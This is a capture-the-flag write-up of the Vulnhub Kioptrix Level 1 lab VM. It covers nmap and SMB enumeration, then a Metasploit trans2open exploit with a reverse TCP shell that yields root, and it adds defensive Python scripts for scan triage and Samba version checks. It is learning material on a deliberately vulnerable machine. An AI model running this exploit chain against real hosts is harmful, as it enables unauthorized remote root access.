Vulnhub – Kioptrix: Level 1 (#1)

Kioptrix Level 1 is the first in a series of five. The point of the game is to get a root shell on the vulnerable machine. The Kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to the VMs in the PWK course for those who want to get the OSCP certification. More info from the author is listed below, with the link to download the VM here.

Description from the author:
“This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.”

Without further ado, let’s get started.

Kali Linux machine

192.168.182.147

Reconnaissance

Using netdiscover I found the victim at the IP address 192.168.182.151.

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning and enumeration

I used nmap to scan the victim and found it was running OpenSSH 2.9p2 on port 22, Apache httpd 1.3.20 on ports 80 and 443, Samba smbd on port 139, and rpcbind on port 111.

root@kali:~# nmap -sS -T4 -A 192.168.182.151

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-10 22:11 CST
Nmap scan report for 192.168.182.151
Host is up (0.00025s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2017-02-11T05:13:37+00:00; +1h01m49s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
MAC Address: 00:0C:29:C2:C8:5D (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC:  (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 192.168.182.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.35 seconds
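The scan above is the kind of output a defender has to triage on every host, and nmap's normal output is easy to parse by hand. The script below is an added example, not part of the original write-up or of nmap: it parses the port table plus the NSE script lines that follow each port, then applies a few triage rules that flag the legacy protocol support the scan shows (SSHv1, SSLv2, HTTP TRACE, an end-of-life Apache 1.3, and a Samba service whose version nmap could not fingerprint). The SAMPLE_NMAP string is a constructed, abbreviated copy of the output above; the rule labels are my own.

```python
import re
from dataclasses import dataclass, field

# Constructed, abbreviated copy of the nmap output above: the port table plus
# the NSE script lines that matter for triage. Host-key and rpcinfo lines
# are omitted to keep the sample short.
SAMPLE_NMAP = """\
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
| sslv2:
|   SSLv2 supported
MAC Address: 00:0C:29:C2:C8:5D (VMware)
"""

# One row of nmap's port table: "22/tcp    open  ssh         OpenSSH 2.9p2 ..."
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: str
    scripts: list = field(default_factory=list)  # NSE output lines for this port


def parse_nmap_normal(text):
    """Parse nmap's human-readable ("normal") output into PortRecords.

    NSE script lines start with "| " or "|_" and belong to the port line
    that precedes them; any other line ends the current port block.
    """
    records, current = [], None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_LINE.match(line)
        if m:
            current = PortRecord(int(m["port"]), m["proto"], m["state"],
                                 m["service"], m["version"].strip())
            records.append(current)
        elif line.startswith("|") and current is not None:
            current.scripts.append(line.lstrip("|_ ").strip())
        else:
            current = None
    return records


# Triage rules: (predicate over a PortRecord, finding label). The first three
# read NSE script output; the rest read the version banner.
RULES = [
    (lambda r: any("Server supports SSHv1" in s for s in r.scripts), "SSHv1 enabled"),
    (lambda r: any("SSLv2 supported" in s for s in r.scripts), "SSLv2 enabled"),
    (lambda r: any("Potentially risky methods" in s and "TRACE" in s for s in r.scripts),
     "HTTP TRACE enabled"),
    (lambda r: r.version.startswith("Apache httpd 1.3"), "Apache 1.3 (end of life)"),
    (lambda r: r.version.startswith("OpenSSH 2."), "OpenSSH 2.x (legacy)"),
    (lambda r: r.service == "netbios-ssn" and "Samba" in r.version
               and not re.search(r"Samba \d", r.version),
     "Samba exposed, version not fingerprinted by nmap"),
]


def triage(records):
    """Return (port, finding) pairs for every open port that trips a rule."""
    findings = []
    for r in records:
        if r.state != "open":
            continue
        for predicate, label in RULES:
            if predicate(r):
                findings.append((r.port, label))
    return findings


if __name__ == "__main__":
    for port, finding in triage(parse_nmap_normal(SAMPLE_NMAP)):
        print(f"{port:>5}/tcp  {finding}")
```

The last rule is the interesting one for this box: nmap reports "Samba smbd" with no version, which is exactly why the write-up falls back to enum4linux for the version; in an inventory pipeline that gap should be surfaced rather than silently treated as "nothing found".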

I used nbtscan to scan for NetBIOS information.

I did a simple SMB enumeration with enum4linux and found that the victim is running Samba 2.2.1a, which is vulnerable to the Samba trans2open overflow. The exploit can be located here.

root@kali:~# enum4linux -a 192.168.182.151 

Exploitation

Samba TRANS2_OPEN Buffer Overflow

A description of this vulnerability, taken from Rapid7’s Vulnerability & Exploit Database, is listed below. With that, I used the Metasploit module exploit/linux/samba/trans2open to exploit this vulnerability.

Description: Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.
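The affected-version ranges in that description are awkward to check by eye because Samba versions carry a letter suffix (2.2.8 is affected, 2.2.8a is not). The following is an added example, not part of the original write-up or of any Samba tooling: it parses Samba version strings, encodes the three ranges from the description above, and runs them over a small constructed inventory of banners in the form enum4linux reports them. The banner regex, the host labels and every banner other than the Kioptrix one are my own assumptions.

```python
import re

# Samba version strings look like "2.2.1a": three numeric parts and an
# optional single-letter suffix, where "2.2.8" sorts before "2.2.8a".
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)([a-z]?)$")
# Pulls the version out of a banner such as "Samba 2.2.1a" (assumed format).
BANNER_RE = re.compile(r"Samba(?:-TNG)?\s+v?(\d+\.\d+\.\d+[a-z]?)")


def parse_version(s):
    m = VERSION_RE.match(s.strip())
    if not m:
        raise ValueError(f"unrecognised Samba version string: {s!r}")
    major, minor, patch, suffix = m.groups()
    # Tuple ordering gives numeric comparison on the digits and "" < "a" on the suffix.
    return (int(major), int(minor), int(patch), suffix)


def is_trans2open_affected(version, product="samba"):
    """True if the version falls in the ranges from the description above:
    Samba 2.2.x before 2.2.8a, Samba 2.0.x up to and including 2.0.10,
    and Samba-TNG before 0.3.2. Anything else (e.g. 3.x) is not affected."""
    v = parse_version(version)
    if product == "samba-tng":
        return v < parse_version("0.3.2")
    if v[:2] == (2, 2):
        return v < parse_version("2.2.8a")
    if v[:2] == (2, 0):
        return v <= parse_version("2.0.10")
    return False


def triage_banners(hosts):
    """hosts: {label: banner}. Returns the labels whose Samba version is affected."""
    affected = []
    for label, banner in hosts.items():
        m = BANNER_RE.search(banner)
        if not m:
            continue  # no readable Samba version; needs a different check
        product = "samba-tng" if "Samba-TNG" in banner else "samba"
        if is_trans2open_affected(m.group(1), product):
            affected.append(label)
    return affected


# Constructed inventory: the first banner is what enum4linux reported for the
# Kioptrix VM; the others are made up to exercise the boundaries of the ranges.
INVENTORY = {
    "kioptrix.level1": "Samba 2.2.1a",
    "host-b (constructed)": "Samba 2.2.8a",
    "host-c (constructed)": "Samba 2.0.10",
    "host-d (constructed)": "Samba 3.0.20",
    "host-e (constructed)": "Samba-TNG 0.3.1",
}

if __name__ == "__main__":
    print("hosts needing a Samba upgrade:", triage_banners(INVENTORY))
```

The fix on the defender's side is the one the description implies: upgrade to 2.2.8a or later (or retire Samba 2.x entirely), and in the meantime keep port 139 off untrusted networks.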

msf > use exploit/linux/samba/trans2open
msf exploit(trans2open) > set RHOST 192.168.182.151
RHOST => 192.168.182.151
msf exploit(trans2open) > set LHOST 192.168.182.147
LHOST => 192.168.182.147
msf exploit(trans2open) > set PAYLOAD linux/x86/shell_reverse_tcp
PAYLOAD => linux/x86/shell_reverse_tcp
msf exploit(trans2open) > exploit

[*] Started reverse TCP handler on 192.168.182.147:4444 
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
[*] Trying return address 0xbffffbfc...
[*] Trying return address 0xbffffafc...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.151:32774) at 2017-02-11 00:16:11 -0600

id
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root
hostname
kioptrix.level1

Conclusion

After getting a root shell I found the flag in /var/spool/mail, which said:
“If you are reading this, you got root. Congratulations.
Level 2 won’t be as easy…”

Well, that’s it for level 1. It will only get harder from here. Next is Level 2.

4 comments

  1. I must say it was hard to find your website in Google.
    You write awesome posts but you should rank your website higher in search engines.
    If you don’t know 2017 SEO techniques, search on YouTube: how to rank a website Marcel’s way

    1. Thank you! When I do write-ups I tend to be elaborate, so that takes a significantly greater amount of time than a simple write-up, which I tend to see a lot. It has proven to be a resource to myself sometimes when I forget certain things and forgot how I did a certain attack or why I did it in the first place. Yes, I will look into that to make my site easier to find. Appreciate it! Sorry for the late response, I have been busy at the moment but now I am back.
